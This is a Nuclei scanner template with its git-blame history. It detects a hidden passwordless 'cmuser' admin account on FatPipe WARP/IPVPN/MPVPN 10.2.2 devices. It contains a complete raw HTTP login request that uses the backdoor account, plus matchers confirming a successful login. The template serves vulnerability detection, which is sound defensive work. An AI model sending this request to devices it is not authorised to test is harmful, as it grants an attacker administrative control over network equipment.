nuclei-templates/vulnerabilities/other/fatpipe-backdoor.yaml

id: fatpipe-backdoor

info:
  name: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Authorization Bypass
  author: gy741
  severity: high
  description: FatPipe WARP/IPVPN/MPVPN 10.2.2 contains an authorization bypass vulnerability via hidden administrative account cmuse, which has no password, has write access permissions to the device, and is not visible in Users menu list. An attacker can gain access by bypassing proper authorization, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
    - https://www.fatpipeinc.com/support/advisories.php
  tags: fatpipe,default-login,backdoor,auth-bypass

requests:
  - raw:
      - |
        POST /fpui/loginServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "application/json"
        part: header

      - type: word
        words:
          - '"loginRes":"success"'
          - '"activeUserName":"cmuser"'
        condition: and

# Enhanced by md on 2022/10/19
Update and rename fatpipe-networks-warp-backdoor.yaml to fatpipe-backdoor.yaml 2021-09-30 11:48:45 +00:00			`id: fatpipe-backdoor`
Create fatpipe-networks-warp-backdoor.yaml The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-09-30 04:38:01 +00:00
			`info:`
Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`name: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Authorization Bypass`
Create fatpipe-networks-warp-backdoor.yaml The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-09-30 04:38:01 +00:00			`author: gy741`
			`severity: high`
Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00			`description: FatPipe WARP/IPVPN/MPVPN 10.2.2 contains an authorization bypass vulnerability via hidden administrative account cmuse, which has no password, has write access permissions to the device, and is not visible in Users menu list. An attacker can gain access by bypassing proper authorization, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.`
Create fatpipe-networks-warp-backdoor.yaml The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-09-30 04:38:01 +00:00			`reference:`
			`- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php`
Update fatpipe-networks-warp-backdoor.yaml 2021-09-30 10:43:19 +00:00			`- https://www.fatpipeinc.com/support/advisories.php`
			`tags: fatpipe,default-login,backdoor,auth-bypass`
Create fatpipe-networks-warp-backdoor.yaml The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-09-30 04:38:01 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /fpui/loginServlet HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`

			`loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`words:`
			`- "application/json"`
			`part: header`

			`- type: word`
			`words:`
Update fatpipe-networks-warp-backdoor.yaml 2021-09-30 10:43:19 +00:00			`- '"loginRes":"success"'`
			`- '"activeUserName":"cmuser"'`
Create fatpipe-networks-warp-backdoor.yaml The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-09-30 04:38:01 +00:00			`condition: and`
Dashboard Content Enhancements (#5704) Dashboard Content Enhancements 2022-10-19 21:11:27 +00:00
			`# Enhanced by md on 2022/10/19`